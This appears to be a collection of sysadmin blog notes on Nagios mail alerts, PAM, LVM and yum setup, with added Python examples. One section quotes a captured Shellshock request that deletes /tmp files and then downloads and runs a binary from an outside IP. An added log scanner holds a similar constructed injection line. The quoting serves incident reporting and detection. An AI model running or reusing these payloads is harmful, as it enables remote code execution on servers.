nagios mail notify

Nagios monitors lots of services, but what if a service goes down?
The most important thing is that the admin is notified right away, and email is a great tool for that.

1.contact.cfg

edit the contact.cfg file to tell nagios which admin should receive all the mail

# template which is defined elsewhere.

define contact{
        contact_name                    nagiosadmin             ; Short name of user
        use                             generic-contact         ; Inherit default values from generic-contact template (defined above)
        alias                           Nagios Admin            ; Full name of user

        email                           admin@gmail.com  ; <<***** CHANGE THIS TO YOUR EMAIL ADDRESS ******
        }

2.commands.cfg

nothing needs to be changed in commands.cfg; the sample is shown below:

# 'notify-host-by-email' command definition
define command{
        command_name    notify-host-by-email
        command_line    /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
        }

# 'notify-service-by-email' command definition
define command{
        command_name    notify-service-by-email
        command_line    /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ **" $CONTACTEMAIL$
        }

3.using sendmail in linux to send mail

edit /etc/mail.rc, which is the config file of sendmail

# add by admin

set from=sender@gmail.com smtp=smtp.gmail.com
set smtp-auth-user=sender@gmail.com smtp-auth-password=pwd_email_account smtp-auth=login

4.windows.cfg
enable mail notification by adding the option “notifications_enabled 1”

# Change the host_name to match the name of the host you defined above

define service{
        use                     generic-service
        host_name               COS360,PRINTER_SRV_BJ,MENJIN,VM_BJ
        service_description     C:\ Drive Space
        check_command           check_nt!USEDDISKSPACE!-l c -w 80 -c 90
        notifications_enabled   1
        }

//adding notifications_enabled to a service turns notification on

5.testing

bring down one of the services and you will get the email notification

–EOF–

nagios

You can use Nagios to monitor your basic IT infrastructure resources.

First define a host to be monitored, then use define service to attach checks to it; it is an object-oriented way of thinking.

Taking the NT platform as an example, install the NSClient++ plugin as an agent on the hosts you want to monitor.

define host{
        use             windows-server  ; Inherit default values from a template
        host_name       host1  ; The name we're giving to this host
        alias           COS Security Server     ; A longer name associated with the host
        address         172.16.60.134   ; IP address of the host
        }


define service{
        use                     generic-service
        host_name               host1
        service_description     NSClient++ Version
        check_command           check_nt!CLIENTVERSION
        }

check_command is the bin action that monitors the resource; there are lots of monitor actions in $nagios/bin and you add

–EOF–

wordpress post to pdf issue

For the post to pdf issue, you need the post2pdf plugin, and you need to solve the mbstring and encoding issue in PHP.

Work as follows:
http://www.knowledgebase-script.com/kb/article/how-to-enable-mbstring-in-php-46.html
//
Below is a sample excerpt php.ini file which contains the configuration of mbstring variables.
[mbstring]
mbstring.language = all
mbstring.internal_encoding = UTF-8
mbstring.http_input = auto
mbstring.http_output = UTF-8
mbstring.encoding_translation = On
mbstring.detect_order = UTF-8
mbstring.substitute_character = none;
mbstring.func_overload = 0
mbstring.strict_encoding = Off
//

configure php with the --enable-mbstring=all option

..

–EOF–

user local logon fail

I can access my Linux box over ssh, but local logon failed with the error below in /var/log/security:

Jun 24 11:19:36 localhost login: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jun 24 11:19:36 localhost login: Permission denied

The root cause is an error in /etc/pam.d/login:

[root@VM42 ~]# more /etc/pam.d/login
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_console.so
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session    required     pam_selinux.so open
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      system-auth
-session   optional     pam_ck_connector.so
# add for oracle install
session    reqiured     pam_limits.so

The spelling of reqiured is not correct. Correct it and everything goes right.
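
A small linter for the failure described above, as an added example that is not part of the original post: it checks the type and control fields of every rule against the keywords in pam.conf(5), so a misspelled flag such as reqiured is caught before the next login attempt. The name lint_pam and the message texts are illustrative.

```python
import re

# Keywords from pam.conf(5); PAM tokens are case-insensitive, module paths are not.
# Inside a [value=action ...] control the action is a keyword or a jump count.
TYPES = {"auth", "account", "password", "session"}
CONTROLS = {"required", "requisite", "sufficient", "optional", "include", "substack"}
BRACKET_ITEM = re.compile(r"^[a-z_]+=(ignore|bad|die|ok|done|reset|\d+)$")
RULE = re.compile(r"^-?(\S+)\s+(\[[^\]]*\]|\S+)\s*(.*)$")

# The /etc/pam.d/login file from the post, including the misspelled last rule.
LOGIN_PAM = """\
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_console.so
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session    required     pam_selinux.so open
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      system-auth
-session   optional     pam_ck_connector.so
# add for oracle install
session    reqiured     pam_limits.so
"""


def lint_pam(text):
    """Return (line_number, message) for every rule with an invalid field."""
    problems = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        match = RULE.match(line)
        if not match:
            problems.append((lineno, "incomplete rule"))
            continue
        ptype, control, module = match.groups()
        if ptype.lower() not in TYPES:
            problems.append((lineno, f"unknown type {ptype!r}"))
        if control.startswith("["):
            items = control[1:-1].lower().split()
            if not items or not all(BRACKET_ITEM.match(i) for i in items):
                problems.append((lineno, f"malformed control {control!r}"))
        elif control.lower() not in CONTROLS:
            problems.append((lineno, f"unknown control flag {control!r}"))
        if not module:
            problems.append((lineno, "missing module or file name"))
    return problems

if __name__ == "__main__":
    for lineno, message in lint_pam(LOGIN_PAM):
        print(f"/etc/pam.d/login:{lineno}: {message}")
```

Running it over a file after every edit, from a root shell that stays open, avoids being locked out of the console by a typo.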

-EOF-

China.z Malware info

My prod server had a security issue; the page below describes the same case:

From: http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

Also, you can follow these pages as a workaround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html
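
Detection logic for requests like the one quoted above, as an added example that is not part of the original post or the quoted page: it scans access-log lines for the "() {" function-definition marker and pulls out any download URL that follows it, for blocking and hunting. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Bash treats an environment value starting with "() {" as a function to import,
# and CGI copies request headers into the environment, so the marker is logged.
MARKER = re.compile(r"\(\s*\)\s*\{")
URL = re.compile(r"https?://[^\s\"'\\;]+")

# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Jan/2015:10:00:05 +0000] "GET /cgi-bin/a.cgi HTTP/1.1" 404 209 "-" '
    '"() { :; }; /bin/bash -c \\"wget http://192.0.2.10/payload -O /tmp/x\\""',
    '198.51.100.23 - - [01/Jan/2015:10:00:06 +0000] "GET / HTTP/1.1" 200 512 "() { :;};echo x" "-"',
    '203.0.113.9 - - [01/Jan/2015:10:01:00 +0000] "GET /docs/func() HTTP/1.1" 200 99 "-" "curl/7.29"',
    '198.51.100.77 - - [01/Jan/2015:10:02:00 +0000] "GET /?a=%28%29%20%7B%20:;%7D; HTTP/1.1" 200 512 "-" "-"',
]


def find_probes(log_lines):
    """Return one record per line carrying the marker: line number, client, URLs."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        decoded = unquote(line)  # also match a percent-encoded copy of the marker
        found = MARKER.search(decoded)
        if not found:
            continue
        injected = decoded[found.end():]  # the injected command follows the marker
        hits.append({
            "line": lineno,
            "client": line.split(" ", 1)[0],
            "urls": sorted(set(URL.findall(injected))),
        })
    return hits


def summarize(hits):
    """Count hits per client and collect the download URLs worth blocking."""
    clients, urls = {}, set()
    for hit in hits:
        clients[hit["client"]] = clients.get(hit["client"], 0) + 1
        urls.update(hit["urls"])
    return clients, sorted(urls)


if __name__ == "__main__":
    clients, urls = summarize(find_probes(SAMPLE_LOG))
    print("probing clients:", clients)
    print("download URLs:", urls)
```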

–EOF–

 

some basic operations of LVM

 

1.change the partition id to LVM format(id=8e)
 
After running "fdisk /dev/sdb", go through fdisk -> t -> 8e to change the partition to Linux LVM format.
 
//check the partition id information
fdisk -l
 
Disk /dev/sda: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        2458    19743853+  83  Linux
/dev/sda2            2459        2610     1220940   82  Linux swap / Solaris
 
Disk /dev/sdb: 2147 MB, 2147483648 bytes
255 heads, 63 sectors/track, 261 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1         125     1004031    8e  Linux LVM
/dev/sdb2             126         261     1092420   8e  Linux LVM
 
Disk /dev/sdc: 2147 MB, 2147483648 bytes
255 heads, 63 sectors/track, 261 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
   Device Boot      Start         End      Blocks   Id  System
/dev/sdc1               1         125     1004031   8e  Linux LVM
/dev/sdc2             126         261     1092420   8e  Linux LVM
 
2.create pv
pvcreate /dev/sdb1 /dev/sdb2
Physical volume "/dev/sdb1" successfully created
Physical volume "/dev/sdb2" successfully created
 
//query the pv info
pvscan
PV /dev/sdb1                      lvm2 [980.50 MB]
PV /dev/sdb2                      lvm2 [1.04 GB]
 
3.create vg
[root@hundsun ~]# vgcreate testvg /dev/sdb1 /dev/sdb2
Volume group "testvg" successfully created
//query the vg information you just created
 
[root@hundsun ~]# vgscan
Reading all physical volumes.  This may take a while...
Found volume group "testvg" using metadata type lvm2
 
4.display the information
//you can see the pv information 
 
[root@hundsun ~]# pvdisplay
  "/dev/sdb1" is a new physical volume of "980.50 MB"
  --- NEW Physical volume ---
  PV Name               /dev/sdb1
  VG Name
  PV Size               980.50 MB
  Allocatable           NO
  PE Size (KByte)       0
  Total PE              0
  Free PE               0
  Allocated PE          0
  PV UUID               UuuhUL-TIJx-JT0w-1yqv-ugWx-aWaj-gExW6w
 
  "/dev/sdb2" is a new physical volume of "1.04 GB"
  --- NEW Physical volume ---
  PV Name               /dev/sdb2
  VG Name
  PV Size               1.04 GB
  Allocatable           NO
  PE Size (KByte)       0
  Total PE              0
  Free PE               0
  Allocated PE          0
  PV UUID               gi9xoW-qvv7-pSWP-ovcG-vjrt-NaI1-KwzyAa
 
5.display vg information
//display the information of vg
 
[root@hundsun ~]# vgdisplay
  --- Volume group ---
  VG Name               testvg
  System ID
  Format                lvm2
  Metadata Areas        2
  Metadata Sequence No  1
  VG Access             read/write
  VG Status             resizable
  MAX LV                0
  Cur LV                0
  Open LV               0
  Max PV                0
  Cur PV                2
  Act PV                2
  VG Size               2.00 GB
  PE Size               4.00 MB
  Total PE              511
  Alloc PE / Size       0 / 0
  Free  PE / Size       511 / 2.00 GB
  VG UUID               M8rjyz-egoA-Oyda-u8Ou-nS4l-gkrf-1Jjen6
 
6.delete a vg
[root@hundsun ~]# vgremove testvg
Volume group "testvg" successfully removed
 
7.create LV
[root@hundsun mapper]# lvcreate -L 200M -n firstLV testvg
Logical volume "firstLV" created
 
//a device will be created at /dev/mapper/{vg_name-lv_name}
[root@hundsun mapper]# ls -l /dev/mapper/testvg-firstLV
brw-rw---- 1 root disk 253, 0 Oct 15 05:09 /dev/mapper/testvg-firstLV
 
//lvdisplay will display all the lv information
[root@hundsun testvg]# lvdisplay
  --- Logical volume ---
  LV Name                /dev/testvg/firstLV
  VG Name                testvg
  LV UUID                vf8a9c-jHAC-She5-yzqh-rvod-osv7-vaSYfp
  LV Write Access        read/write
  LV Status              available
  # open                 0
  LV Size                200.00 MB
  Current LE             50
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto
  - currently set to     256
  Block device           253:0
 
[root@hundsun testvg]# pwd
/dev/testvg
[root@hundsun testvg]# ls -lrt
total 0
lrwxrwxrwx 1 root root 26 Oct 15 05:09 firstLV -> /dev/mapper/testvg-firstLV
 
//you can see that /dev/testvg/firstLV is a symlink to /dev/mapper/testvg-firstLV
 
//after creating the lv, use mkfs.ext3 to make an ext3 filesystem and mount it
 
8.create an ext3 filesystem on the lv just created and mount it
 
[root@hundsun testvg]# mkfs.ext3 /dev/testvg/firstLV
mke2fs 1.39 (29-May-2006)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
51200 inodes, 204800 blocks
10240 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67371008
25 block groups
8192 blocks per group, 8192 fragments per group
2048 inodes per group
Superblock backups stored on blocks:
        8193, 24577, 40961, 57345, 73729
 
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
 
This filesystem will be automatically checked every 33 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
 
//mount it to a point
[root@hundsun /]# mount -t    ext3    /dev/testvg/firstLV /data
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.9G  67%   /
tmpfs                 507M     0  507M   0%      /dev/shm
none                  507M  104K  507M   1%    /var/lib/xenstored
/dev/mapper/testvg-firstLV        194M  5.6M  179M   4% /data
 
9.extend the lv and the mounted filesystem using lvextend
//extend the lv using lvextend; the mounted filesystem does not see the change until
//you run resize2fs -p /dev/testvg/{lvname}
//before resize2fs is run, /data still has 200M and the +100M has not taken effect
 
[root@hundsun /]# lvextend -L +100M /dev/testvg/firstLV
  Extending logical volume firstLV to 300.00 MB
  Logical volume firstLV successfully resized
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.8G  67% /
tmpfs                 507M     0  507M   0% /dev/shm
none                  507M  104K  507M   1% /var/lib/xenstored
/dev/mapper/testvg-firstLV
                      194M  5.6M  179M   4% /data
 
//resize the filesystem to pick up the change in the lv
[root@hundsun /]# resize2fs -p /dev/testvg/firstLV
resize2fs 1.39 (29-May-2006)
Filesystem at /dev/testvg/firstLV is mounted on /data; on-line resizing required
Performing an on-line resize of /dev/testvg/firstLV to 307200 (1k) blocks.
The filesystem on /dev/testvg/firstLV is now 307200 blocks long.
 
[root@hundsun /]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              19G   12G  5.8G  67% /
tmpfs                 507M     0  507M   0% /dev/shm
none                  507M  104K  507M   1% /var/lib/xenstored
/dev/mapper/testvg-firstLV
                      291M  6.1M  270M   3% /data
 
–EOF–

 

rpm prepare for rac install on linux

The rpm information is listed in the note below:

Document 811306.1 RAC and Oracle Clusterware Best Practices and Starter Kit (Linux)

Check out the example for OEL4 x86_64; you need to install each required rpm package to avoid later error messages.

—————————————————————————————————

64-Bit Required RPM's

[Red Hat, Oracle] Enterprise Linux 4:
 
binutils-2.15.92.0.2-13.0.0.0.2.x86_64 (you can install binutils-2.15.92.0.2-18.x86_64.rpm from RHEL4 Update 3.)
 
compat-db-4.1.25-9.x86_64.rpm
 
compat-gcc-32-c++ (with Patch 5240469 to correct bad genoccish file. see Note WebIV:430526.1)
 
compat-libstdc++-33-3.2.3-47.3.x86_64.rpm
 
compat-libstdc++-33-3.2.3-47.3.i386.rpm 
 
control-center-2.8.0-12.x86_64.rpm
 
gcc-3.4.3-47.x86_64.rpm
 
gcc-c++-3.4.3-47.x86_64.rpm   
 
glibc-2.3.4-2.9.x86_64.rpm   
 
glibc-2.3.4-2.9.i386.rpm   
 
glibc-common-2.3.4-2.9.x86_64.rpm   
 
glibc-devel-2.3.4-2.9.x86_64.rpm   
 
glibc-devel-2.3.4-2.9.i386.rpm   
 
glibc-headers-2.3.4-2.9.x86_64.rpm   
 
glibc-kernheaders-2.4-9.1.87.x86_64.rpm   
 
gnome-libs-1.4.1.2.90-44.1.x86_64
 
libaio-0.3.103-3.i386.rpm
 
libaio-0.3.103-3.x86_64.rpm   
 
libgcc-3.4.3-9.EL4
 
libstdc++-3.4.3-22.1.x86_64   
 
libstdc++-devel-3.4.3-22.1.x86_64   
 
make-3.80-5.x86_64.rpm
 
pdksh-5.2.14-30.x86_64.rpm   
 
sysstat-5.0.5-1.x86_64.rpm   
 
util-linux-2.12a-16.EL4.23.x86_64 (for raw devices)   
 
xorg-x11-deprecated-libs-6.8.1-23
 
xscreensaver-4.18-5.rhel4.2.x86_64.rpm   
 

——————————————————————————–

It's quite easy to find the details; for some rpm packages you need both the x86 and x86_64 versions.

issue of yum config in rhel 5u5

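Installing rpm packages on RHEL 5u5 is very annoying: without a license you cannot connect to Red Hat's yum repositories, so the only option is to turn to the CentOS repositories for help.

Go into the /etc/yum.repos.d directory. It contains a default repo file, rhel-debuginfo.repo; delete it and recreate it, since its contents are not much help.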

[molin@localhost downloads]$ cd /etc/yum.repos.d

[molin@localhost downloads]$ vi rhel-debuginfo.repo

The contents of the file are as follows:

[base]
name=CentOS-5 - Base

baseurl=http://ftp.sjtu.edu.cn/centos/5/os/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-centos5

If you run yum install for an rpm package at this point, you will hit an error:

warning: rpmts_HdrFromFdno: Header V3 DSA signature: NOKEY, key………….

You also need to import the key again:

rpm --import http://centos.ustc.edu.cn/centos/RPM-GPG-KEY-CentOS-5

 

[root@hundsun ~]# yum install libaio-devel
Loaded plugins: rhnplugin, security
This system is not registered with RHN.
RHN support will be disabled.
Setting up Install Process
Resolving Dependencies
--> Running transaction check
---> Package libaio-devel.i386 0:0.3.106-5 set to be updated
---> Package libaio-devel.x86_64 0:0.3.106-5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

================================================================================
 Package              Arch          Version              Repository       Size
================================================================================
Installing:
 libaio-devel         i386          0.3.106-5            base             12 k
 libaio-devel         x86_64        0.3.106-5            base             11 k

Transaction Summary
================================================================================
Install 2 Package(s)
Upgrade 0 Package(s)

Total download size: 23 k
Is this ok [y/N]: y
Downloading Packages:
(1/2): libaio-devel-0.3.106-5.x86_64.rpm | 11 kB 00:00
(2/2): libaio-devel-0.3.106-5.i386.rpm | 12 kB 00:00
--------------------------------------------------------------------------------
Total 6.8 kB/s | 23 kB 00:03
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : libaio-devel 1/2
Installing : libaio-devel 2/2

Installed:
libaio-devel.i386 0:0.3.106-5 libaio-devel.x86_64 0:0.3.106-5

Complete!

Now yum works normally. Of course, all of the configuration above rests on one precondition: "the machine can ping the external network".
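
An added example (not from the original post) that audits a .repo file for the trust settings this setup relies on: with gpgcheck=1 the packages are only as trustworthy as the imported key, and a key fetched over plain HTTP, as in the gpgkey line and the rpm --import call above, can be replaced in transit. The two extra stanzas, the local key path and the function name audit_repos are constructed for comparison.

```python
import configparser

# First stanza: the one from the post. The other two are constructed variants.
REPO_FILE = """\
[base]
name=CentOS-5 - Base
baseurl=http://ftp.sjtu.edu.cn/centos/5/os/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-centos5

[base-local-key]
name=CentOS-5 - Base (constructed: key copied locally, fingerprint verified)
baseurl=http://ftp.sjtu.edu.cn/centos/5/os/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-5

[base-unsigned]
name=CentOS-5 - Base (constructed: signature check switched off)
baseurl=http://ftp.sjtu.edu.cn/centos/5/os/$basearch/
gpgcheck=0
"""

PLAINTEXT = ("http://", "ftp://")  # transports without server authentication


def audit_repos(text):
    """Return (repo, option, problem) tuples for settings that weaken package trust."""
    parser = configparser.ConfigParser(interpolation=None)  # keep $basearch literal
    parser.read_string(text)
    findings = []
    for repo in parser.sections():
        section = parser[repo]
        if section.get("enabled", "1").strip() == "0":
            continue  # disabled repositories are not consulted
        if section.get("gpgcheck", "").strip() != "1":
            findings.append((repo, "gpgcheck", "not set to 1 in this section"))
            if section.get("baseurl", "").startswith(PLAINTEXT):
                findings.append((repo, "baseurl", "unsigned packages over plaintext"))
        # gpgkey may list several URLs separated by whitespace
        for key_url in section.get("gpgkey", "").split():
            if key_url.startswith(PLAINTEXT):
                findings.append((repo, "gpgkey", "signing key fetched over plaintext"))
    return findings


if __name__ == "__main__":
    for repo, option, problem in audit_repos(REPO_FILE):
        print(f"[{repo}] {option}: {problem}")
```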

 

 

oracle public yum server

Sometimes you need a way to resolve rpm dependencies, and YUM is a better solution. If your server can access the web, you are the lucky one; check out the following, picked from http://public-yum.oracle.com/

Public Yum Server

 

Introduction

The Oracle public yum server offers a free and convenient way to install the latest Oracle Linux packages as well as packages from the Oracle VM installation media via a yum client.

You can download the full Oracle Linux and Oracle VM installation media via edelivery.oracle.com/linux. To stay current on errata updates, you may wish to subscribe to the Oracle Linux errata mailing list.

This yum server is offered without support of any kind. If you require support, please consider purchasing Oracle Linux Support via the online store, or via your sales representative.

Getting Started

  1. Download and Install Oracle Linux
  2. Download and copy the appropriate yum configuration file in place, by running the following commands as root:

    Oracle Linux 4, Update 6 or Newer

    # cd /etc/yum.repos.d
    # mv Oracle-Base.repo Oracle-Base.repo.disabled
    # wget http://public-yum.oracle.com/public-yum-el4.repo

    Oracle Linux 5

    # cd /etc/yum.repos.d
    # wget http://public-yum.oracle.com/public-yum-el5.repo

    Oracle Linux 6

    # cd /etc/yum.repos.d
    # wget http://public-yum.oracle.com/public-yum-ol6.repo

    Oracle VM 2

    # cd /etc/yum.repos.d
    # wget http://public-yum.oracle.com/public-yum-ovm2.repo
  3. Enable the appropriate repository by editing the yum configuration file
    • Open the yum configuration file in a text editor
    • Locate the section in the file for the repository you plan to update from, e.g. [el4_u6_base]
    • Change enabled=0 to enabled=1
  4. Begin using yum, for example:

    yum list
    yum install firefox

You may be prompted to confirm the import of the Oracle OSS Group GPG key.